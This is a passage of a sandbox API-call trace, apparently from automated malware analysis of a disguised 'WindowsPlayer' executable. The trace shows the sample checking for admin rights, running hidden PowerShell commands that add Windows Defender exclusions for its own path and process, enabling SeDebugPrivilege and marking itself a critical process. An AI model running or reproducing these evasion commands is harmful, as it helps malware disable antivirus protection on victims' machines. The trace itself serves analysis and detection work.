Ipv6OtherStatefulConfig=0x1c5, NetbiosOverTcpipEnabled=0x1c5, Ipv4Enabled=0x1c5, Ipv6Enabled=0x1c5, Ipv6ManagedAddressConfigurationSupported=0x1c5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0x5, ZoneIndices=([0]=0x5, [1]=0x5, [2]=0x5, [3]=0x5, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0x19, Ipv6Metric=0x19, Luid.Value=0x6008001000000, Luid.Info.Reserved=0x6008001000000, Luid.Info.NetLuidIndex=0x6008001000000, Luid.Info.IfType=0x6008001000000, Dhcpv4Server.lpSockaddr=0x1afe6d90*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11edae4e88edbb0c, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x2b, [5]=0x80, [6]=0x6f, [7]=0x77, [8]=0x0, [9]=0x19, [10]=0x8b, [11]=0x9e, [12]=0xe5, [13]=0x6c, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x600198b, FirstDnsSuffix=0x0), SizePointer=0x18e8d8*=0x3fff) returned 0x0 [0224.850] LocalFree (hMem=0x1afe6bd0) returned 0x0 [0224.856] WSAConnect (in: s=0x618, name=0x2295ed0*(sa_family=2, sin_port=0x50, sin_addr="208.95.112.1"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0224.886] closesocket (s=0x5e8) returned 0 [0224.920] send (s=0x618, buf=0x2296c88*, len=80, flags=0) returned 80 [0224.946] setsockopt (s=0x618, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0 [0224.946] recv (in: s=0x618, buf=0x2291e30, len=4096, flags=0 | out: buf=0x2291e30*) returned 175 [0225.206] setsockopt (s=0x618, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0225.207] SetEvent (hEvent=0x430) returned 1 [0225.557] GetCurrentProcess () returned 0xffffffffffffffff [0225.557] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x18ee98 | out: TokenHandle=0x18ee98*=0x5e8) returned 1 [0225.562] GetTokenInformation (in: TokenHandle=0x5e8, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18eef8 | out: TokenInformation=0x0, ReturnLength=0x18eef8) returned 0 [0225.563] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1afa5640 [0225.563] GetTokenInformation (in: TokenHandle=0x5e8, TokenInformationClass=0x8, TokenInformation=0x1afa5640, TokenInformationLength=0x4, ReturnLength=0x18eef8 | out: TokenInformation=0x1afa5640, ReturnLength=0x18eef8) returned 1 [0225.565] LocalFree (hMem=0x1afa5640) returned 0x0 [0225.567] DuplicateTokenEx (in: hExistingToken=0x5e8, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x18ef58 | out: phNewToken=0x18ef58*=0x630) returned 1 [0225.567] CheckTokenMembership (in: TokenHandle=0x630, SidToCheck=0x229b300*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18ef60 | out: IsMember=0x18ef60) returned 1 [0225.567] CloseHandle (hObject=0x630) returned 1 [0226.002] LocalAlloc (uFlags=0x0, uBytes=0x1e) returned 0x1afc80f0 [0226.003] LocalAlloc (uFlags=0x0, uBytes=0x11a) returned 0x1afb0f60 [0226.003] ShellExecuteExW (in: pExecInfo=0x229b928*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="powershell.exe", lpParameters="-ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe'", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x229b928*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="powershell.exe", lpParameters="-ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe'", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x7a8)) returned 1 [0228.416] LocalFree (hMem=0x1afc80f0) returned 0x0 [0228.416] LocalFree (hMem=0x1afb0f60) returned 0x0 [0228.422] GetCurrentProcess () returned 0xffffffffffffffff [0228.422] GetCurrentProcess () returned 0xffffffffffffffff [0228.422] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x7a8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x18ef30, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x18ef30*=0x6bc) returned 1 [0228.426] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x18edd0*=0x6bc, lpdwindex=0x18ebb4 | out: lpdwindex=0x18ebb4) returned 0x0 [0313.328] CloseHandle (hObject=0x6bc) returned 1 [0313.329] GetCurrentProcessId () returned 0x1518 [0313.329] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1518) returned 0x6bc [0313.330] EnumProcessModules (in: hProcess=0x6bc, lphModule=0x229bbb0, cb=0x200, lpcbNeeded=0x18efa0 | out: lphModule=0x229bbb0, lpcbNeeded=0x18efa0) returned 1 [0313.332] EnumProcessModules (in: hProcess=0x6bc, lphModule=0x229bde0, cb=0x400, lpcbNeeded=0x18efa0 | out: lphModule=0x229bde0, lpcbNeeded=0x18efa0) returned 1 [0313.334] GetModuleInformation (in: hProcess=0x6bc, hModule=0x10000, lpmodinfo=0x229c250, cb=0x18 | out: lpmodinfo=0x229c250*(lpBaseOfDll=0x10000, SizeOfImage=0x38000, EntryPoint=0x0)) returned 1 [0313.334] CoTaskMemAlloc (cb=0x804) returned 0x1b006050 [0313.334] GetModuleBaseNameW (in: hProcess=0x6bc, hModule=0x10000, lpBaseName=0x1b006050, nSize=0x800 | out: lpBaseName="LIVE-WindowsPlayer-version-492b7f0827474659.exe") returned 0x2f [0313.335] CoTaskMemFree (pv=0x1b006050) [0313.335] CoTaskMemAlloc (cb=0x804) returned 0x1b006050 [0313.335] GetModuleFileNameExW (in: hProcess=0x6bc, hModule=0x10000, lpFilename=0x1b006050, nSize=0x800 | out: lpFilename="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe" (normalized: "c:\\users\\oqxzraykm\\appdata\\roaming\\live-windowsplayer-version-492b7f0827474659.exe")) returned 0x52 [0313.335] CoTaskMemFree (pv=0x1b006050) [0313.335] CloseHandle (hObject=0x6bc) returned 1 [0313.337] LocalAlloc (uFlags=0x0, uBytes=0x1e) returned 0x1affda30 [0313.337] LocalAlloc (uFlags=0x0, uBytes=0xda) returned 0x1afed0e0 [0313.338] ShellExecuteExW (in: pExecInfo=0x229e728*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="powershell.exe", lpParameters="-ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'LIVE-WindowsPlayer-version-492b7f0827474659.exe'", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x229e728*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="powershell.exe", lpParameters="-ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'LIVE-WindowsPlayer-version-492b7f0827474659.exe'", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x6ec)) returned 1 [0313.451] LocalFree (hMem=0x1affda30) returned 0x0 [0313.451] LocalFree (hMem=0x1afed0e0) returned 0x0 [0313.452] GetCurrentProcess () returned 0xffffffffffffffff [0313.452] GetCurrentProcess () returned 0xffffffffffffffff [0313.452] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x6ec, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x18ef30, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x18ef30*=0x3a8) returned 1 [0313.453] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x18edd0*=0x3a8, lpdwindex=0x18ebb4 | out: lpdwindex=0x18ebb4) returned 0x0 [0352.865] CloseHandle (hObject=0x3a8) returned 1 [0352.881] SetThreadExecutionState (esFlags=0xffffffff80000003) returned 0x80000000 [0353.031] GetCurrentProcess () returned 0xffffffffffffffff [0353.032] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x18eee8 | out: TokenHandle=0x18eee8*=0x3ec) returned 1 [0353.032] GetTokenInformation (in: TokenHandle=0x3ec, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18ef48 | out: TokenInformation=0x0, ReturnLength=0x18ef48) returned 0 [0353.033] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1b007740 [0353.033] GetTokenInformation (in: TokenHandle=0x3ec, TokenInformationClass=0x8, TokenInformation=0x1b007740, TokenInformationLength=0x4, ReturnLength=0x18ef48 | out: TokenInformation=0x1b007740, ReturnLength=0x18ef48) returned 1 [0353.033] LocalFree (hMem=0x1b007740) returned 0x0 [0353.033] DuplicateTokenEx (in: hExistingToken=0x3ec, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x18efa8 | out: phNewToken=0x18efa8*=0x3dc) returned 1 [0353.033] CheckTokenMembership (in: TokenHandle=0x3dc, SidToCheck=0x229efb8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18efb0 | out: IsMember=0x18efb0) returned 1 [0353.033] CloseHandle (hObject=0x3dc) returned 1 [0353.059] GetProcessWindowStation () returned 0xe8 [0353.059] GetUserObjectInformationA (in: hObj=0xe8, nIndex=1, pvInfo=0x229f418, nLength=0xc, lpnLengthNeeded=0x18efb0 | out: pvInfo=0x229f418, lpnLengthNeeded=0x18efb0) returned 1 [0353.060] SetConsoleCtrlHandler (HandlerRoutine=0x560c4c, Add=1) returned 1 [0353.061] GetModuleHandleW (lpModuleName=0x0) returned 0x10000 [0353.062] GetModuleHandleW (lpModuleName=0x0) returned 0x10000 [0353.065] GetClassInfoW (in: hInstance=0x10000, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.1f550a4.0", lpWndClass=0x229f4d8 | out: lpWndClass=0x229f4d8) returned 0 [0353.066] CoTaskMemAlloc (cb=0x58) returned 0x1b015e70 [0353.066] RegisterClassW (lpWndClass=0x18edb0) returned 0xc150 [0353.066] CoTaskMemFree (pv=0x1b015e70) [0353.067] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.1f550a4.0", lpWindowName=".NET-BroadcastEventWindow.4.0.0.0.1f550a4.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x10000, lpParam=0x0) returned 0x7031c [0353.185] NtdllDefWindowProc_W (hWnd=0x7031c, Msg=0x81, wParam=0x0, lParam=0x18e6f0) returned 0x1 [0353.198] NtdllDefWindowProc_W (hWnd=0x7031c, Msg=0x83, wParam=0x0, lParam=0x18e7a0) returned 0x0 [0353.198] NtdllDefWindowProc_W (hWnd=0x7031c, Msg=0x1, wParam=0x0, lParam=0x18e690) returned 0x0 [0353.198] NtdllDefWindowProc_W (hWnd=0x7031c, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0353.199] NtdllDefWindowProc_W (hWnd=0x7031c, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0353.222] GetCurrentProcess () returned 0xffffffffffffffff [0353.222] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x18f018 | out: TokenHandle=0x18f018*=0x3dc) returned 1 [0353.222] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x18f010 | out: lpLuid=0x18f010*(LowPart=0x14, HighPart=0)) returned 1 [0353.224] AdjustTokenPrivileges (in: TokenHandle=0x3dc, DisableAllPrivileges=0, NewState=0x229fb08*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0353.225] CloseHandle (hObject=0x3dc) returned 1 [0353.277] RtlSetProcessIsCritical (in: NewValue=1, OldValue=0x18f020, IsWinlogon=0 | out: OldValue=0x18f020) [0354.084] CoWaitForMultipleHandles (dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x18eed8*=0x1f0, lpdwindex=0x18ec64) [0358.725] CoGetContextToken (in: pToken=0x18d390 | out: pToken=0x18d390) returned 0x0 [0358.725] CoGetContextToken (in: pToken=0x18d360 | out: pToken=0x18d360) returned 0x0 [0358.725] CoGetContextToken (in: pToken=0x18d250 | out: pToken=0x18d250) returned 0x0 [0358.726] IUnknown:Release (This=0x68ea50) returned 0x2 [0358.726] IUnknown:Release (This=0x68ea50) returned 0x1 [0358.726] CoGetContextToken (in: pToken=0x18d250 | out: pToken=0x18d250) returned 0x0 [0358.726] IUnknown:Release (This=0x1afa9cd0) returned 0x2 [0358.726] IUnknown:Release (This=0x1afa9cd0) returned 0x1 [0358.726] CoGetContextToken (in: pToken=0x18d250 | out: pToken=0x18d250) returned 0x0 [0358.726] IUnknown:Release (This=0x1afac300) returned 0x2 [0358.726] IUnknown:Release (This=0x1afac300) returned 0x1 [0358.728] CoGetContextToken (in: pToken=0x18d4a0 | out: pToken=0x18d4a0) returned 0x0 [0358.728] CoGetContextToken (in: pToken=0x18d410 | out: pToken=0x18d410) returned 0x0 [0358.728] IUnknown:Release (This=0x686b30) returned 0x1 [0358.728] IUnknown:Release (This=0x686b30) returned 0x0 [0358.793] CoGetContextToken (in: pToken=0x18d4a0 | out: pToken=0x18d4a0) returned 0x0 [0358.793] CoGetContextToken (in: pToken=0x18d410 | out: pToken=0x18d410) returned 0x0 [0358.793] IUnknown:Release (This=0x686770) returned 0x1 [0358.793] IUnknown:Release (This=0x686770) returned 0x0 [0358.811] CoGetContextToken (in: pToken=0x18d4a0 | out: pToken=0x18d4a0) returned 0x0 [0358.811] CoGetContextToken (in: pToken=0x18d410 | out: pToken=0x18d410) returned 0x0 [0358.811] IUnknown:Release (This=0x6864f0) returned 0x1 [0358.811] IUnknown:Release (This=0x6864f0) returned 0x0 Thread: id = 90 os_tid = 0x15bc Thread: id = 91 os_tid = 0x320 Thread: id = 92 os_tid = 0xdd8 [0188.169] CoGetContextToken (in: pToken=0x1a75fa30 | out: pToken=0x1a75fa30) returned 0x800401f0 [0188.169] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0188.170] RoInitialize () returned 0x1 [0188.170] RoUninitialize () returned 0x0 [0358.723] CoGetContextToken (in: pToken=0x1a75fa70 | out: pToken=0x1a75fa70) returned 0x0 [0358.723] CoGetContextToken (in: pToken=0x1a75f960 | out: pToken=0x1a75f960) returned 0x0 [0358.723] WbemLocator:IUnknown:Release (This=0x65d780) returned 0x1 [0358.723] WbemLocator:IUnknown:Release (This=0x65d780) returned 0x0 [0358.723] CoGetContextToken (in: pToken=0x1a75f960 | out: pToken=0x1a75f960) returned 0x0 [0358.723] WbemLocator:IUnknown:Release (This=0x67c7d0) returned 0x1 [0358.723] WbemLocator:IUnknown:Release (This=0x67c7d0) returned 0x0 [0358.724] CoGetContextToken (in: pToken=0x1a75fa70 | out: pToken=0x1a75fa70) returned 0x0 [0358.724] CoGetContextToken (in: pToken=0x1a75f960 | out: pToken=0x1a75f960) returned 0x0 [0358.724] WbemDefPath:IUnknown:Release (This=0x67e980) returned 0x1 [0358.724] WbemDefPath:IUnknown:Release (This=0x67e980) returned 0x0 [0358.724] CoGetContextToken (in: pToken=0x1a75fa70 | out: pToken=0x1a75fa70) returned 0x0 [0358.724] IUnknown:QueryInterface (in: This=0x61b048, riid=0x7fffa7d3e6f0*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a75f888 | out: ppvObject=0x1a75f888*=0x61b068) returned 0x0 [0358.724] CObjectContext::ContextCallback () returned 0x0 [0358.726] IUnknown:Release (This=0x61b068) returned 0x1 [0358.726] IUnknown:Release (This=0x1afac300) returned 0x0 [0358.727] CoGetContextToken (in: pToken=0x1a75f680 | out: pToken=0x1a75f680) returned 0x0 [0358.727] IUnknown:QueryInterface (in: This=0x61b048, riid=0x7fffa7d3e6f0*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a75f498 | out: ppvObject=0x1a75f498*=0x61b068) returned 0x0 [0358.727] CObjectContext::ContextCallback () returned 0x0 [0358.792] IUnknown:Release (This=0x61b068) returned 0x1 [0358.792] IUnknown:Release (This=0x1afa9cd0) returned 0x0 [0358.792] CoGetContextToken (in: pToken=0x1a75f680 | out: pToken=0x1a75f680) returned 0x0 [0358.792] IUnknown:QueryInterface (in: This=0x61b048, riid=0x7fffa7d3e6f0*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a75f498 | out: ppvObject=0x1a75f498*=0x61b068) returned 0x0 [0358.793] CObjectContext::ContextCallback () returned 0x0 [0358.810] IUnknown:Release (This=0x61b068) returned 0x1 [0358.810] CoGetContextToken (in: pToken=0x1a75f6b0 | out: pToken=0x1a75f6b0) returned 0x0 [0358.810] IUnknown:QueryInterface (in: This=0x61b048, riid=0x7fffa7d3e6f0*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a75f4c8 | out: ppvObject=0x1a75f4c8*=0x61b068) returned 0x0 [0358.811] CObjectContext::ContextCallback () returned 0x0 [0358.821] IUnknown:Release (This=0x61b068) returned 0x1 [0358.821] IUnknown:Release (This=0x61b048) returned 0x0 [0358.822] IUnknown:Release (This=0x68ea50) returned 0x0 [0358.823] CloseHandle (hObject=0x3ec) returned 1 [0358.828] CloseHandle (hObject=0x408) returned 1 [0358.828] CloseHandle (hObject=0x404) returned 1 [0358.828] CloseHandle (hObject=0x3fc) returned 1 [0358.832] CloseHandle (hObject=0x2e8) returned 1 [0358.832] CloseHandle (hObject=0x7a8) returned 1 [0358.832] CloseHandle (hObject=0x6ec) returned 1 [0358.833] CloseHandle (hObject=0x5e8) returned 1 [0358.834] CloseHandle (hObject=0x420) returned 1 [0369.722] CoGetContextToken (in: pToken=0x1a75fa70 | out: pToken=0x1a75fa70) returned 0x0 [0369.722] CoGetContextToken (in: pToken=0x1a75f960 | out: pToken=0x1a75f960) returned 0x0 [0369.722] WbemDefPath:IUnknown:Release (This=0x67d3c0) returned 0x1 [0369.722] WbemDefPath:IUnknown:Release (This=0x67d3c0) returned 0x0 [0369.722] CoGetContextToken (in: pToken=0x1a75f960 | out: pToken=0x1a75f960) returned 0x0 [0369.722] WbemDefPath:IUnknown:Release (This=0x67ebc0) returned 0x1 [0369.722] WbemDefPath:IUnknown:Release (This=0x67ebc0) returned 0x0 [0369.722] CoGetContextToken (in: pToken=0x1a75fa70 | out: pToken=0x1a75fa70) returned 0x0 [0369.722] CoGetContextToken (in: pToken=0x1a75f960 | out: pToken=0x1a75f960) returned 0x0 [0369.723] WbemLocator:IUnknown:Release (This=0x66e960) returned 0x4 [0369.724] CoReleaseMarshalData (pStm=0x665b50) returned 0x0 [0369.725] WbemLocator:IUnknown:Release (This=0x66e960) returned 0x3 [0369.725] WbemLocator:IUnknown:Release (This=0x66e960) returned 0x2 [0369.725] WbemLocator:IUnknown:Release (This=0x66e960) returned 0x1 [0369.725] WbemLocator:IUnknown:Release (This=0x66e960) returned 0x0 [0369.728] CoGetContextToken (in: pToken=0x1a75f960 | out: pToken=0x1a75f960) returned 0x0 [0369.728] WbemLocator:IUnknown:Release (This=0x66e600) returned 0x4 [0369.728] CoReleaseMarshalData (pStm=0x666360) returned 0x0 [0369.728] WbemLocator:IUnknown:Release (This=0x66e600) returned 0x3 [0369.729] WbemLocator:IUnknown:Release (This=0x66e600) returned 0x2 [0369.729] WbemLocator:IUnknown:Release (This=0x66e600) returned 0x1 [0369.729] WbemLocator:IUnknown:Release (This=0x66e600) returned 0x0 [0369.730] IUnknown:Release (This=0x61b170) returned 0x0 Thread: id = 93 os_tid = 0x1364 [0196.952] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0196.952] RoInitialize () returned 0x1 [0196.952] RoUninitialize () returned 0x0 [0197.103] IIDFromString (in: lpsz="{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}", lpiid=0x1ab9ed48 | out: lpiid=0x1ab9ed48) returned 0x0 [0197.109] CoGetClassObject (in: rclsid=0x618158*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fffa7d19540*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1ab9e920 | out: ppv=0x1ab9e920*=0x65d4c0) returned 0x0 [0197.336] WbemDefPath:IUnknown:QueryInterface (in: This=0x65d4c0, riid=0x7fffa7d3e650*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1ab9e968 | out: ppvObject=0x1ab9e968*=0x0) returned 0x80004002 [0197.337] WbemDefPath:IClassFactory:CreateInstance (in: This=0x65d4c0, pUnkOuter=0x0, riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ab9e918 | out: ppvObject=0x1ab9e918*=0x63aee0) returned 0x0 [0197.338] WbemDefPath:IUnknown:Release (This=0x65d4c0) returned 0x0 [0197.339] WbemDefPath:IUnknown:QueryInterface (in: This=0x63aee0, riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ab9e728 | out: ppvObject=0x1ab9e728*=0x63aee0) returned 0x0 [0197.339] WbemDefPath:IUnknown:QueryInterface (in: This=0x63aee0, riid=0x7fffa7cf6928*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1ab9e7d0 | out: ppvObject=0x1ab9e7d0*=0x0) returned 0x80004002 [0197.340] WbemDefPath:IUnknown:QueryInterface (in: This=0x63aee0, riid=0x7fffa7cf6978*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x1ab9dfd8 | out: ppvObject=0x1ab9dfd8*=0x0) returned 0x80004002 [0197.340] WbemDefPath:IUnknown:AddRef (This=0x63aee0) returned 0x3 [0197.340] WbemDefPath:IUnknown:QueryInterface (in: This=0x63aee0, riid=0x7fffa7cf6938*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x1ab9de78 | out: ppvObject=0x1ab9de78*=0x0) returned 0x80004002 [0197.340] WbemDefPath:IUnknown:QueryInterface (in: This=0x63aee0, riid=0x7fffa7cf6948*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1ab9de00 | out: ppvObject=0x1ab9de00*=0x0) returned 0x80004002 [0197.340] WbemDefPath:IUnknown:QueryInterface (in: This=0x63aee0, riid=0x7fffa7cf5da0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ab9ddf0 | out: ppvObject=0x1ab9ddf0*=0x65d5c0) returned 0x0 [0197.341] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x65d5c0, riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1ab9de18 | out: pCid=0x1ab9de18*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0197.341] WbemDefPath:IUnknown:Release (This=0x65d5c0) returned 0x3 [0197.341] CoGetContextToken (in: pToken=0x1ab9dea0 | out: pToken=0x1ab9dea0) returned 0x0 [0197.341] CoGetContextToken (in: pToken=0x1ab9e320 | out: pToken=0x1ab9e320) returned 0x0 [0197.341] 